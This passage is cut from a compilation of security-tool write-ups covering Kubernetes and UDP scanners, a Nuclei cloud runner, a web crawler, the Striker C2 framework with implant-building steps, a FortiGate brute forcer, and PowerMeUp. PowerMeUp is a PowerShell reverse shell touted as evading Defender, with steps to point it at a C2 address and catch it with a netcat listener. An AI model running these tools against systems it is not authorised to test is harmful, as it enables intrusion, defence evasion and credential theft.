No. of hosts to process simultaneously
--verify-ssl Verify SSL certificates
--version Display the version of KubeStalk and exit.

Basic Usage

To use the tool, you can pass one or more hosts to the script. All targets passed to the tool must be RFC 3986 complaint, i.e. must contain a scheme and hostname (and port if required).

A basic usage is as below:

$ python3 kubestalk.py https://โ–ˆโ–ˆโ–ˆ.โ–ˆโ–ˆ.โ–ˆโ–ˆ.โ–ˆโ–ˆโ–ˆ:10250

+---------------------+
| K U B E S T A L K |
+---------------------+ v0.1

[!] KubeStalk by RedHunt Labs - A Modern Attack Surface (ASM) Management Company
[!] Author: 0xInfection (RHL Research Team)
[!] Continuously Track Your Attack Surface using https://redhuntlabs.com/nvadr.

[+] Loaded 10 signatures to scan.
[*] Processing host: https://โ–ˆโ–ˆโ–ˆ.โ–ˆโ–ˆ.โ–ˆโ–ˆ.โ–ˆโ–ˆ:10250
[!] Found potential issue on https://โ–ˆโ–ˆโ–ˆ.โ–ˆโ–ˆ.โ–ˆโ–ˆ.โ–ˆโ–ˆ:10250: Kubernetes Pod List Exposure
[*] Writing results to output file.
[+] Done.

HTTP Tuning

HTTP requests can be fine-tuned using the -t (to mention HTTP timeouts), -ua (to specify custom user agents) and the --verify-ssl (to validate SSL certificates while making requests).

Concurrency

You can control the number of hosts to scan simultanously using the --concurrency flag. The default value is set to 5.

Output

The output is written to a CSV filea and can be controlled by the --output flag.

A sample of the CSV output rendered in markdown is as belows:

host path issue type severity
https://โ–ˆ.โ–ˆ.โ–ˆ.โ–ˆ:10250 /pods Kubernetes Pod List Exposure core-component vulnerability/misconfiguration
https://โ–ˆ.โ–ˆ.โ–ˆ.โ–ˆ:443 /api/v1/pods Kubernetes Pod List Exposure core-component vulnerability/misconfiguration
http://โ–ˆ.โ–ˆ.โ–ˆโ–ˆ.โ–ˆ:80 / etcd Viewer Dashboard Exposure add-on vulnerability/exposure
http://โ–ˆโ–ˆ.โ–ˆโ–ˆ.โ–ˆ.โ–ˆ:80 / cAdvisor Metrics Web UI Dashboard Exposure add-on vulnerability/exposure

Version & License

The tool is licensed under the BSD 3 Clause License and is currently at v0.1.

To know more about our Attack Surface Management platform, check out NVADR.



Nuclearpond - A Utility Leveraging Nuclei To Perform Internet Wide Scans For The Cost Of A Cup Of Coffee


Nuclear Pond is used to leverage Nuclei in the cloud with unremarkable speed, flexibility, and perform internet wide scans for far less than a cup of coffee.

It leverages AWS Lambda as a backend to invoke Nuclei scans in parallel, choice of storing json findings in s3 to query with AWS Athena, and is easily one of the cheapest ways you can execute scans in the cloud.


Features

  • Output results to your terminal, json, or to S3
  • Specify threads and parallel invocations in any desired number of batches
  • Specify any Nuclei arguments just like you would locally
  • Specify a single host or from a file
  • Run the http server to take scans from the API
  • Run the http server to get status of the scans
  • Query findings through Athena for searching S3
  • Specify a custom nuclei and reporting configurations

Usage

Think of Nuclear Pond as just a way for you to run Nuclei in the cloud. You can use it just as you would on your local machine but run them in parallel and with however many hosts you want to specify. All you need to think of is the nuclei command line flags you wish to pass to it.

Setup & Installation

To install Nuclear Pond, you need to configure the backend terraform module. You can do this by running terraform apply or by leveraging terragrunt.

$ go install github.com/DevSecOpsDocs/nuclearpond@latest

Environment Variables

You can either pass in your backend with flags or through environment variables. You can use -f or --function-name to specify your Lambda function and -r or --region to the specified region. Below are environment variables you can use.

  • AWS_LAMBDA_FUNCTION_NAME is the name of your lambda function to execute the scans on
  • AWS_REGION is the region your resources are deployed
  • NUCLEARPOND_API_KEY is the API key for authenticating to the API
  • AWS_DYNAMODB_TABLE is the dynamodb table to store API scan states

Command line flags

Below are some of the flags you can specify when running nuclearpond. The primary flags you need are -t or -l for your target(s), -a for the nuclei args, and -o to specify your output. When specifying Nuclei args you must pass them in as base64 encoded strings by performing -a $(echo -ne "-t dns" | base64).

Commands

Below are the subcommands you can execute within nuclearpond.

  • run: Execute nuclei scans
  • service: Basic API to execute nuclei scans

Run

To run nuclearpond subcommand nuclearpond run -t devsecopsdocs.com -r us-east-1 -f jwalker-nuclei-runner-function -a $(echo -ne "-t dns" | base64) -o cmd -b 1 in which the target is devsecopsdocs.com, region is us-east-1, lambda function name is jwalker-nuclei-runner-function, nuclei arguments are -t dns, output is cmd, and executes one function through a batch of one host through -b 1.

$ nuclearpond run -h
Executes nuclei tasks in parallel by invoking lambda asynchronously

Usage:
nuclearpond run [flags]

Flags:
-a, --args string nuclei arguments as base64 encoded string
-b, --batch-size int batch size for number of targets per execution (default 1)
-f, --function-name string AWS Lambda function name
-h, --help help for run
-o, --output string output type to save nuclei results(s3, cmd, or json) (default "cmd")
-r, --region string AWS region to run nuclei
-s, --silent silent command line output
-t, --target string individual target to specify
-l, --targets string list of targets in a file
-c, --threads int number of threads to run lambda funct ions, default is 1 which will be slow (default 1)

Custom Templates

The terraform module by default downloads the templates on execution as well as adds the templates as a layer. The variables to download templates use the terraform github provider to download the release zip. The folder name within the zip will be located within /opt. Since Nuclei downloads them on run we do not have to but to improve performance you can specify -t /opt/nuclei-templates-9.3.4/dns to execute templates from the downloaded zip. To specify your own templates you must reference a release. When doing so on your own repository you must specify these variables in the terraf orm module, github_token is not required if your repository is public.

  • github_repository
  • github_owner
  • release_tag
  • github_token

Retrieving Findings

If you have specified s3 as the output, your findings will be located in S3. The fastest way to get at them is to do so with Athena. Assuming you setup the terraform-module as your backend, all you need to do is query them directly through athena. You may have to configure query results if you have not done so already.

select
*
from
nuclei_db.findings_db
limit 10;

Advance Query

In order to get down into queries a little deeper, I thought I would give you a quick example. In the select statement we drill down into info column, "matched-at" column must be in double quotes due to - character, and you are searching only for high and critical findings generated by Nuclei.

SELECT
info.name,
host,
type,
info.severity,
"matched-at",
info.description,
template,
dt
FROM
"nuclei_db"."findings_db"
where
host like '%devsecopsdocs.com'
and info.severity in ('high','critical')

Infrastructure

The backend infrastructure, all within terraform module. I would strongly recommend reading the readme associated to it as it will have some important notes.

  • Lambda function
  • S3 bucket
    • Stores nuclei binary
    • Stores configuration files
    • Stores findings
  • Glue Database and Table
    • Allows you to query the findings in S3
    • Partitioned by the hour
    • Partition projection
  • IAM Role for Lambda Function


PowerMeUp - A Small Library Of Powershell Scripts For Post Exploitation That You May Need Or Use!


This is a powershell reverse shell that executes the commands and or scripts that you add to the powerreverse.ps1 file as well as a small library of Post-Exploitation scripts. This also can be used for post exploitation and lateral movement even. Please use at your own risk I am not and will not be responsible for your actions. Also this reverse shell currently is not detected by Windows Defender. If you want to use this make sure to detup a Digital Ocean VPS and have the script connect back there or your C2. Happy Hacking!


Key Features

  • Reverse Shell
    • Simply Change The IP & Port & Let It Do Its Magic
  • Blue Screen Of Death (BSOD)
    • Basically will call winit.exe and give a blue screen and shutdown the computer
  • Disable Windows Defender (Needs Admin Priv Of Course)
  • Get Computer Information
  • Disable Input (Needs Admin Priv)
  • Disable Monitor
  • Exclude File Extensions (Needs Admin Priv)
  • Exclude Folder (Needs Admin Priv)
  • Exclude Process (Needs Admin Priv)
  • Get USB History
  • GPS Location (Gets The Lat & Long Then Performs A Reverse GEO Lookup & Spits Out The Exact Address)
  • Grab Wifi Credentials
  • Ifconfig
  • List Antivirus Running
  • List External IP
  • Logoff
  • Mayham Window Popup
  • Send A Message Box
  • Network Scan (Internall Scan The Network For Open Ports & IPs)
  • Restart
  • Rickroll
  • Scare Window
  • Screenshot The Screen
  • Syatem Time
  • Webcam List

How To Use

To run this application, you'll need the powerreverse.ps1 file executed on target pc.

# Install This Repository
$ Download The Code By Pressing Download ZIP

# Clone this repository
$ git clone https://github.com/ItsCyberAli/PowerMeUp.git

# Take One Of The Functions Like This & Copy Paste Into PowerReverse
$ You Will See The Screenshot Below Has The PowerReverse file and inside I added the BSOD.ps1 function
that I copy pasted inside of the powerreverse.ps1 so that we can call & use it when we execute on target PC.
You can mix & match what features you want in the reverse shell just make sure there is no references right above the function call
it will say references and if it says 0 you are fine if it says 1 or more simply change the function name. When reverse shell
executes and you want to execute a specific feature simply call the function name and in our case inside the VPS sim ply type bsod
and it will execute it or whateber you named the function!


# Change The LHOST & LPORT Inside Of The PowerReverse File
$LHOST = "YOUR C2 IP"
$LPORT = #Your Port Without Quotations

# Start A Netcat Listener Or Your Own Implementation Of A Listener On VPS Or C2 & Enjoy!
$ nc -l -p <port you chose> (Just A Netcat Listener In Your VPS Not Needed If You Use Another Method!)

Download

You can download the code from the top right, it will give you all the code needed in a ZIP file.

Reach Me Here

If you want to discuss any topics or need some help I am very active and can get back to you within 24 hours or less And Setup A Date & Time To Help With Whatever It Is You Need, I Am Also Open To Collab On Projects I Feel Are Worth My Time And Of My Interest As Well!!



FortiGate Brute Forcer

This python script is a slow brute forcing utility to check passwords against FortiGate appliances. Check the homepage link for more information on how this was used to slowly bypass brute force protections.

Striker - A Command And Control (C2)


Striker is a simple Command and Control (C2) program.


Disclaimer

This project is under active development. Most of the features are experimental, with more to come. Expect breaking changes.

Features

A) Agents

  • Native agents for linux and windows hosts.
  • Self-contained, minimal python agent should you ever need it.
  • HTTP(s) channels.
  • Aynchronous tasks execution.
  • Support for multiple redirectors, and can fallback to others when active one goes down.

B) Backend / Teamserver

  • Supports multiple operators.
  • Most features exposed through the REST API, making it easy to automate things.
  • Uses web sockets for faster comms.

C) User Interface

  • Smooth and reactive UI thanks to Svelte and SocketIO.
  • Easy to configure as it compiles into static HTML, JavaScript, and CSS files, which can be hosted with even the most basic web server you can find.
  • Teamchat feature to communicate with other operators over text.

Installing Striker

Clone the repo;

$ git clone https://github.com/4g3nt47/Striker.git
$ cd Striker

The codebase is divided into 4 independent sections;

1. The C2 Server / Backend

This handles all server-side logic for both operators and agents. It is a NodeJS application made with;

  • express - For the REST API.
  • socket.io - For Web Socket communtication.
  • mongoose - For connecting to MongoDB.
  • multer - For handling file uploads.
  • bcrypt - For hashing user passwords.

The source code is in the backend/ directory. To setup the server;

  1. Setup a MongoDB database;

Striker uses MongoDB as backend database to store all important data. You can install this locally on your machine using this guide for debian-based distros, or create a free one with MongoDB Atlas (A database-as-a-service platform).

  1. Move into the source directory;
$ cd backend
  1. Install dependencies;
$ npm install
  1. Create a directory for static files;
$ mkdir static

You can use this folder to host static files on the server. This should also be where your UPLOAD_LOCATION is set to in the .env file (more on this later), but this is not necessary. Files in this directory will be publicly accessible under the path /static/.

  1. Create a .env file;

NOTE: Values between < and > are placeholders. Replace them with appropriate values (including the <>). For fields that require random strings, you can generate them easily using;

$ head -c 100 /dev/urandom | sha256sum
DB_URL=<your MongoDB connection URL>
HOST=<host to listen on (default: 127.0.0.1)>
PORT=<port to listen on (default: 3000)>
SECRET=<random string to use for signing session cookies and encrypting session data>
ORIGIN_URL=<full URL of the server you will be hosting the frontend at. Used to setup CORS>
REGISTRATION_KEY=<random string to use for authentication during signup>
MAX_UPLOAD_SIZE=<max file upload size, in bytes>
UPLOAD_LOCATION=<directory to store uploaded files to (default: static)>
SSL_KEY=<your SSL key file (optional)>
SSL_CERT=<your SSL cert file (optional)>

Note that SSL_KEY and SSL_CERT are optional. If any is not defined, a plain HTTP server will be created. This helps avoid needless overhead when running the server behind an SSL-enabled reverse proxy on the same host.

  1. Start the server;
$ node index.js
[12:45:30 PM] Connecting to backend database...
[12:45:31 PM] Starting HTTP server...
[12:45:31 PM] Server started on port: 3000

2. The Frontend

This is the web UI used by operators. It is a single page web application written in Svelte, and the source code is in the frontend/ directory.

To setup the frontend;

  1. Move into the source directory;
$ cd frontend
  1. Install dependencies;
$ npm install
  1. Create a .env file with the variable VITE_STRIKER_API set to the full URL of the C2 server as configured above;
VITE_STRIKER_API=https://c2.striker.local
  1. Build;
$ npm run build

The above will compile everything into a static web application in dist/ directory. You can move all the files inside into the web root of your web server, or even host it with a basic HTTP server like that of python;

$ cd dist
$ python3 -m http.server 8000
  1. Signup;
  • Open the site in a web browser. You should see a login page.
  • Click on the Register button.
  • Enter a username, password, and the registration key in use (see REGISTRATION_KEY in backend/.env)

This will create a standard user account. You will need an admin account to access some features. Your first admin account must be created manually, afterwards you can upgrade and downgrade other accounts in the Users tab of the web UI.

To create your first admin account;

  • Connect to the MongoDB database used by the backend.
  • Update the users collection and set the admin field of the target user to true;

There are different ways you can do this. If you have mongo available in you CLI, you can do it using;

$ mongo <your MongoDB connection URL>
> db.users.updateOne({username: "<your username>"}, {$set: {admin: true}})

You should get the following response if it works;

{ "acknowledged" : true, "matchedCount" : 1, "modifiedCount" : 1 }

You can now login :)

3. The C2 Redirector

A) Dumb Pipe Redirection

A dumb pipe redirector written for Striker is available at redirector/redirector.py. Obviously, this will only work for plain HTTP traffic, or for HTTPS when SSL verification is disabled (you can do this by enabling the INSECURE_SSL macro in the C agent).

The following example listens on port 443 on all interfaces and forward to c2.example.org on port 443;

$ cd redirector
$ ./redirector.py 0.0.0.0:443 c2.example.org:443
[*] Starting redirector on 0.0.0.0:443...
[+] Listening for connections...

B) Nginx Reverse Proxy as Redirector

  1. Install Nginx;
$ sudo apt install nginx
  1. Create a vhost config (e.g: /etc/nginx/sites-available/striker);

Placeholders;

  • <domain-name> - This is your server's FQDN, and should match the one in you SSL cert.
  • <ssl-cert> - The SSL cert file to use.
  • <ssl-key> - The SSL key file to use.
  • <c2-server> - The full URL of the C2 server to forward requests to.

WARNING: client_max_body_size should be as large as the size defined by MAX_UPLOAD_SIZE in your backend/.env file, or uploads for large files will fail.

server {
listen 443 ssl;
server_name <domain-name>;
ssl_certificate <ssl-cert>;
ssl_certificate_key <ssl-key>;
client_max_body_size 100M;
access_log /var/log/nginx/striker.log;

location / {
proxy_pass <c2-server>;
proxy_redirect off;
proxy_ssl_verify off;
proxy_read_timeout 90;
proxy_http_version 1.0;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
}
}
  1. Enable it;
$ sudo ln -s /etc/nginx/sites-available/striker /etc/nginx/sites-enabled/striker
  1. Restart Nginx;
$ sudo service nginx restart

Your redirector should now be up and running on port 443, and can be tested using (assuming your FQDN is striker.local);

$ curl https://striker.local

If it works, you should get the 404 response used by the backend, like;

{"error":"Invalid route!"}

4. The Agents (Implants)

A) The C Agent

These are the implants used by Striker. The primary agent is written in C, and is located in agent/C/. It supports both linux and windows hosts. The linux agent depends externally on libcurl, which you will find installed in most systems.

The windows agent does not have an external dependency. It uses wininet for comms, which I believe is available on all windows hosts.

  1. Building for linux

Assuming you're on a 64 bit host, the following will build for 64 host;

$ cd agent/C
$ mkdir bin
$ make

To build for 32 bit on 64;

$ sudo apt install gcc-multilib
$ make arch=32

The above compiles everything into the bin/ directory. You will need only two files to generate working implants;

  • bin/stub - This is the agent stub that will be used as template to generate working implants.
  • bin/builder - This is what you will use to patch the agent stub to generate working implants.

The builder accepts the following arguments;

$ ./bin/builder 
[-] Usage: ./bin/builder <url> <auth_key> <delay> <stub> <outfile>

Where;

  • <url> - The server to report to. This should ideally be a redirector, but a direct URL to the server will also work.
  • <auth_key> - The authentication key to use when connecting to the C2. You can create this in the auth keys tab of the web UI.
  • <delay> - Delay between each callback, in seconds. This should be at least 2, depending on how noisy you want it to be.
  • <stub> - The stub file to read, bin/stub in this case.
  • <outfile> - The output filename of the new implant.

Example;

$ ./bin/builder https://localhost:3000 979a9d5ace15653f8ffa9704611612fc 5 bin/stub bin/striker
[*] Obfuscating strings...
[+] 69 strings obfuscated :)
[*] Finding offsets of our markers...
[+] Offsets:
URL: 0x0000a2e0
OBFS Key: 0x0000a280
Auth Key: 0x0000a2a0
Delay: 0x0000a260
[*] Patching...
[+] Operation completed!
  1. Building for windows

You will need MinGW for this. The following will install the 32 and 64 bit dev windows environment;

$ sudo apt install mingw-w64

Build for 64 bit;

$ cd agent/C
$ mdkir bin
$ make target=win

To compile for 32 bit;

$ make target=win arch=32

This will compile everything into the bin/ directory, and you will have the builder and the stub as bin\stub.exe and bin\builder.exe, respectively.

B) The Python Agent

Striker also comes with a self-contained python agent (tested on python 2.7.16 and 3.7.3). This is located at agent/python/. Only the most basic features are implemented in this agent. Useful for hosts that can't run the C agent but have python installed.

There are 2 file in this directory;

  • stub.py - This is the payload stub to pass to the builder.
  • builder.py - This is what you'll be using to generate an implant.

Usage example:

$ ./builder.py
[-] Usage: builder.py <url> <auth_key> <delay> <stub> <outfile>
# The following will generate a working payload as `output.py`
$ ./builder.py http://localhost:3000 979a9d5ace15653f8ffa9704611612fc 2 stub.py output.py
[*] Loading agent stub...
[*] Writing configs...
[+] Agent built successfully: output.py
# Run it
$ python3 output.py

Getting Started

After following the above instructions, Striker should now be ready for use. Kindly go through the usage guide. Have fun, and happy hacking!

Support

If you like the project, consider helping me turn coffee into code!



UDPX - Fast A nd Lightweight, UDPX Is A Single-Packet UDP Scanner Written In Go That Supports The Discovery Of Over 45 Services With The Ability To Add Custom Ones


Fast and lightweight, UDPX is a single-packet UDP scanner written in Go that supports the discovery of over 45 services with the ability to add custom ones. It is easy to use and portable, and can be run on Linux, Mac OS, and Windows. Unlike internet-wide scanners like zgrab2 and zmap, UDPX is designed for portability and ease of use.

  • It is fast. It can scan whole /16 network in ~20 seconds for a single service.
  • You don't need to instal libpcap or any other dependencies.
  • Can run on Linux, Mac Os, Windows. Or your Nethunter if you built it for Arm.
  • Customizable. You can add your probes and test for even more protocols.
  • Stores results in JSONL format.
  • Scans also domain names.

How it works

Scanning UDP ports is very different than scanning TCP - you may, or may not get any result back from probing an UDP port as UDP is a connectionless protocol. UDPX implements a single-packet based approach. A protocol-specific packet is sent to the defined service (port) and waits for a response. The limit is set to 500 ms by default and can be changed by -w flag. If the service sends a packet back within this time, it is certain that it is indeed listening on that port and is reported as open.

A typical technique is to send 0 byte UDP packets to each port on the target machine. If we receive an "ICMP Port Unreachable" message, then the port is closed. If an UDP response is received to the probe (unusual), the port is open. If we get no response at all, the state is open or filtered, meaning that the port is either open or packet filters are blocking the communication. This method is not implemented as there is no added value (UDPX tests only for specific protocols).

Usage

Concurrency: By default, concurrency is set to 32 connections only (so you don't crash anything). If you have a lot of hosts to scan, you can set it to 128 or 256 connections. Based on your hardware, connection stability, and ulimit (on *nix), you can run 512 or more concurrent connections, but this is not recommended.

To scan a single IP:

udpx -t 1.1.1.1

To scan a CIDR with maximum of 128 connections and timeout of 1000 ms:

udpx -t 1.2.3.4/24 -c 128 -w 1000

To scan targets from file with maximum of 128 connections for only specific service:

udpx -tf targets.txt -c 128 -s ipmi

Target can be:

  • IP address
  • CIDR
  • Domain

IPv6 is supported.

If you want to store the results, use flag -o [filename]. Output is in JSONL format, as can be seen bellow:

{"address":"45.33.32.156","hostname":"scanme.nmap.org","port":123,"service":"ntp","response_data":"JAME6QAAAEoAAA56LU9vp+d2ZPwOYIyDxU8jS3GxUvM="}

Options


__ ______ ____ _ __
/ / / / __ \/ __ \ |/ /
/ / / / / / / /_/ / /
/ /_/ / /_/ / ____/ |
\____/_____/_/ /_/|_|
v1.0.2-beta, by @nullt3r

Usage of ./udpx-linux-amd64:
-c int
Maximum number of concurrent connections (default 32)
-nr
Do not randomize addresses
-o string
Output file to write results
-s string
Scan only for a specific service, one of: ard, bacnet, bacnet_rpm, chargen, citrix, coap, db, db, digi1, digi2, digi3, dns, ipmi, ldap, mdns, memcache, mssql, nat_port_mapping, natpmp, netbios, netis, ntp, ntp_monlist, openvpn, pca_nq, pca_st, pcanywhere, portmap, qotd, rdp, ripv, sentinel, sip, snmp1, snmp2, snmp3, ssdp, tftp, ubiquiti, ubiquiti_discovery_v1, ubiquiti_discovery_v2, upnp, valve, wdbrpc, wsd, wsd_malformed, xdmcp, kerberos, ike
-sp
Show received packets (only first 32 bytes)
-t string
IP/CIDR to scan
-tf string
File containing IPs/CIDRs to scan
-w int
Maximum time to wait for a response (socket timeout) in ms (default 500)

Building

You can grab prebuilt binaries in the release section. If you want to build UDPX from source, follow these steps:

From git:

git clone https://github.com/nullt3r/udpx
cd udpx
go build ./cmd/udpx

You can find the binary in the current directory.

Or via go:

go install -v github.com/nullt3r/udpx/cmd/udpx@latest

After that, you can find the binary in $HOME/go/bin/udpx. If you want, move binary to /usr/local/bin/ so you can call it directly.

Supported services

The UDPX supports more then 45 services. The most interesting are:

  • ipmi
  • snmp
  • ike
  • tftp
  • openvpn
  • kerberos
  • ldap

The complete list of supported services:

  • ard
  • bacnet
  • bacnet_rpm
  • chargen
  • citrix
  • coap
  • db
  • db
  • digi1
  • digi2
  • digi3
  • dns
  • ipmi
  • ldap
  • mdns
  • memcache
  • mssql
  • nat_port_mapping
  • natpmp
  • netbios
  • netis
  • ntp
  • ntp_monlist
  • openvpn
  • pca_nq
  • pca_st
  • pcanywhere
  • portmap
  • qotd
  • rdp
  • ripv
  • sentinel
  • sip
  • snmp1
  • snmp2
  • snmp3
  • ssdp
  • tftp
  • ubiquiti
  • ubiquiti_discovery_v1
  • ubiquiti_discovery_v2
  • upnp
  • valve
  • wdbrpc
  • wsd
  • wsd_malformed
  • xdmcp
  • kerberos
  • ike

How to add your own probe?

Please send a feature request with protocol name and port and I will make it happen. Or add it on your own, the file pkg/probes/probes.go contains all available payloads. Specify the protocol name, port and packet data (hex-encoded).

{
Name: "ike",
Payloads: []string{"5b5e64c03e99b51100000000000000000110020000000000000001500000013400000001000000010000012801010008030000240101"},
Port: []int{500, 4500},
},

Credits

Disclaimer

I am not responsible for any damages. You are responsible for your own actions. Scanning or attacking targets without prior mutual consent can be illegal.

License

UDPX is distributed under MIT License.



Katana - A Next-Generation Crawling And Spidering Framework


A next-generation crawling and spidering framework

Features โ€ข Installation โ€ข Usage โ€ข Scope โ€ข Config โ€ข Filters โ€ข Join Discord

Features

  • Fast And fully configurable web crawling
  • Standard and Headless mode support
  • JavaScript parsing / crawling
  • Customizable automatic form filling
  • Scope control - Preconfigured field / Regex
  • Customizable output - Preconfigured fields
  • INPUT - STDIN, URL and LIST
  • OUTPUT - STDOUT, FILE and JSON

Installation

katana requires Go 1.18 to install successfully. To install, just run the below command or download pre-compiled binary from release page.

go install github.com/projectdiscovery/katana/cmd/katana@latest

Usage

katana -h

This will display help for the tool. Here are all the switches it supports.

Usage:
./katana [flags]

Flags:
INPUT:
-u, -list string[] target url / list to crawl

CONFIGURATION:
-d, -depth int maximum depth to crawl (default 2)
-jc, -js-crawl enable endpoint parsing / crawling in javascript file
-ct, -crawl-duration int maximum duration to crawl the target for
-kf, -known-files string enable crawling of known files (all,robotstxt,sitemapxml)
-mrs, -max-response-size int maximum response size to read (default 2097152)
-timeout int time to wait for request in seconds (default 10)
-aff, -automatic-form-fill enable optional automatic form filling (experimental)
-retry int number of times to retry the request (default 1)
-proxy string http/socks5 proxy to use
-H, -headers string[] custom hea der/cookie to include in request
-config string path to the katana configuration file
-fc, -form-config string path to custom form configuration file

DEBUG:
-health-check, -hc run diagnostic check up
-elog, -error-log string file to write sent requests error log

HEADLESS:
-hl, -headless enable headless hybrid crawling (experimental)
-sc, -system-chrome use local installed chrome browser instead of katana installed
-sb, -show-browser show the browser on the screen with headless mode
-ho, -headless-options string[] start headless chrome with additional options
-nos, -no-sandbox start headless chrome in --no-sandbox mode
-scp, -system-chrome-path string use specified chrome binary path for headless crawling
-noi, -no-incognito start headless chrome without incognito mode

SCOPE:
-cs, -crawl-scope string[] in scope url regex to be followed by crawler
-cos, -crawl-out-scope string[] out of scope url regex to be excluded by crawler
-fs, -field-scope string pre-defined scope field (dn,rdn,fqdn) (default "rdn")
-ns, -no-scope disables host based default scope
-do, -display-out-scope display external endpoint from scoped crawling

FILTER:
-f, -field string field to display in output (url,path,fqdn,rdn,rurl,qurl,qpath,file,key,value,kv,dir,udir)
-sf, -store-field string field to store in per-host output (url,path,fqdn,rdn,rurl,qurl,qpath,file,key,value,kv,dir,udir)
-em, -extension-match string[] match output for given extension (eg, -em php,html,js)
-ef, -extension-filter string[] filter output for given extension (eg, -ef png,css)

RATE-LIMIT:
-c, -concurrency int number of concurrent fetchers to use (defaul t 10)
-p, -parallelism int number of concurrent inputs to process (default 10)
-rd, -delay int request delay between each request in seconds
-rl, -rate-limit int maximum requests to send per second (default 150)
-rlm, -rate-limit-minute int maximum number of requests to send per minute

OUTPUT:
-o, -output string file to write output to
-j, -json write output in JSONL(ines) format
-nc, -no-color disable output content coloring (ANSI escape codes)
-silent display output only
-v, -verbose display verbose output
-version display project version

Running Katana

Input for katana

katana requires url or endpoint to crawl and accepts single or multiple inputs.

Input URL can be provided using -u option, and multiple values can be provided using comma-separated input, similarly file input is supported using -list option and additionally piped input (stdin) is also supported.

URL Input

katana -u https://tesla.com

Multiple URL Input (comma-separated)

katana -u https://tesla.com,https://google.com

List Input

$ cat url_list.txt

https://tesla.com
https://google.com
katana -list url_list.txt

STDIN (piped) Input

echo https://tesla.com | katana
cat domains | httpx | katana

Example running katana -

katana -u https://youtube.com

__ __
/ /_____ _/ /____ ____ ___ _
/ '_/ _ / __/ _ / _ \/ _ /
/_/\_\\_,_/\__/\_,_/_//_/\_,_/ v0.0.1

projectdiscovery.io

[WRN] Use with caution. You are responsible for your actions.
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
https://www.youtube.com/
https://www.youtube.com/about/
https://www.youtube.com/about/press/
https://www.youtube.com/about/copyright/
https://www.youtube.com/t/contact_us/
https://www.youtube.com/creators/
https://www.youtube.com/ads/
https://www.youtube.com/t/terms
https://www.youtube.com/t/privacy
https://www.youtube.com/about/policies/
https://www.youtube.com/howyoutubeworks?utm_campaign=ytgen&utm_source=ythp&utm_medium=LeftNav&utm_content=txt&u=https%3A%2F%2Fwww.youtube.com %2Fhowyoutubeworks%3Futm_source%3Dythp%26utm_medium%3DLeftNav%26utm_campaign%3Dytgen
https://www.youtube.com/new
https://m.youtube.com/
https://www.youtube.com/s/desktop/4965577f/jsbin/desktop_polymer.vflset/desktop_polymer.js
https://www.youtube.com/s/desktop/4965577f/cssbin/www-main-desktop-home-page-skeleton.css
https://www.youtube.com/s/desktop/4965577f/cssbin/www-onepick.css
https://www.youtube.com/s/_/ytmainappweb/_/ss/k=ytmainappweb.kevlar_base.0Zo5FUcPkCg.L.B1.O/am=gAE/d=0/rs=AGKMywG5nh5Qp-BGPbOaI1evhF5BVGRZGA
https://www.youtube.com/opensearch?locale=en_GB
https://www.youtube.com/manifest.webmanifest
https://www.youtube.com/s/desktop/4965577f/cssbin/www-main-desktop-watch-page-skeleton.css
https://www.youtube.com/s/desktop/4965577f/jsbin/web-animations-next-lite.min.vflset/web-animations-next-lite.min.js
https://www.youtube.com/s/desktop/4965577f/jsbin/custom-elements-es5-adapter.vflset/custom-elements-es5-adapter.js
https://w ww.youtube.com/s/desktop/4965577f/jsbin/webcomponents-sd.vflset/webcomponents-sd.js
https://www.youtube.com/s/desktop/4965577f/jsbin/intersection-observer.min.vflset/intersection-observer.min.js
https://www.youtube.com/s/desktop/4965577f/jsbin/scheduler.vflset/scheduler.js
https://www.youtube.com/s/desktop/4965577f/jsbin/www-i18n-constants-en_GB.vflset/www-i18n-constants.js
https://www.youtube.com/s/desktop/4965577f/jsbin/www-tampering.vflset/www-tampering.js
https://www.youtube.com/s/desktop/4965577f/jsbin/spf.vflset/spf.js
https://www.youtube.com/s/desktop/4965577f/jsbin/network.vflset/network.js
https://www.youtube.com/howyoutubeworks/
https://www.youtube.com/trends/
https://www.youtube.com/jobs/
https://www.youtube.com/kids/

Crawling Mode

Standard Mode

Standard crawling modality uses the standard go http library under the hood to handle HTTP requests/responses. This modality is much faster as it doesn't have the browser overhead. Still, it analyzes HTTP responses body as is, without any javascript or DOM rendering, potentially missing post-dom-rendered endpoints or asynchronous endpoint calls that might happen in complex web applications depending, for example, on browser-specific events.

Headless Mode

Headless mode hooks internal headless calls to handle HTTP requests/responses directly within the browser context. This offers two advantages:

  • The HTTP fingerprint (TLS and user agent) fully identify the client as a legitimate browser
  • Better coverage since the endpoints are discovered analyzing the standard raw response, as in the previous modality, and also the browser-rendered one with javascript enabled.

Headless crawling is optional and can be enabled using -headless option.

Here are other headless CLI options -

katana -h headless

Flags:
HEADLESS:
-hl, -headless enable experimental headless hybrid crawling
-sc, -system-chrome use local installed chrome browser instead of katana installed
-sb, -show-browser show the browser on the screen with headless mode
-ho, -headless-options string[] start headless chrome with additional options
-nos, -no-sandbox start headless chrome in --no-sandbox mode
-noi, -no-incognito start headless chrome without incognito mode

-no-sandbox

Runs headless chrome browser with no-sandbox option, useful when running as root user.

katana -u https://tesla.com -headless -no-sandbox

-no-incognito

Runs headless chrome browser without incognito mode, useful when using the local browser.

katana -u https://tesla.com -headless -no-incognito

-headless-options

When crawling in headless mode, additional chrome options can be specified using -headless-options, for example -

katana -u https://tesla.com -headless -system-chrome -headless-options --disable-gpu,proxy-server=http://127.0.0.1:8080

Scope Control

Crawling can be endless if not scoped, as such katana comes with multiple support to define the crawl scope.

-field-scope

Most handy option to define scope with predefined field name, rdn being default option for field scope.

  • rdn - crawling scoped to root domain name and all subdomains (e.g. *example.com) (default)
  • fqdn - crawling scoped to given sub(domain) (e.g. www.example.com or api.example.com)
  • dn - crawling scoped to domain name keyword (e.g. example)
katana -u https://tesla.com -fs dn

-crawl-scope

For advanced scope control, -cs option can be used that comes with regex support.

katana -u https://tesla.com -cs login

For multiple in scope rules, file input with multiline string / regex can be passed.

$ cat in_scope.txt

login/
admin/
app/
wordpress/
katana -u https://tesla.com -cs in_scope.txt

-crawl-out-scope

For defining what not to crawl, -cos option can be used and also support regex input.

katana -u https://tesla.com -cos logout

For multiple out of scope rules, file input with multiline string / regex can be passed.

$ cat out_of_scope.txt

/logout
/log_out
katana -u https://tesla.com -cos out_of_scope.txt

-no-scope

Katana is default to scope *.domain, to disable this -ns option can be used and also to crawl the internet.

katana -u https://tesla.com -ns

-display-out-scope

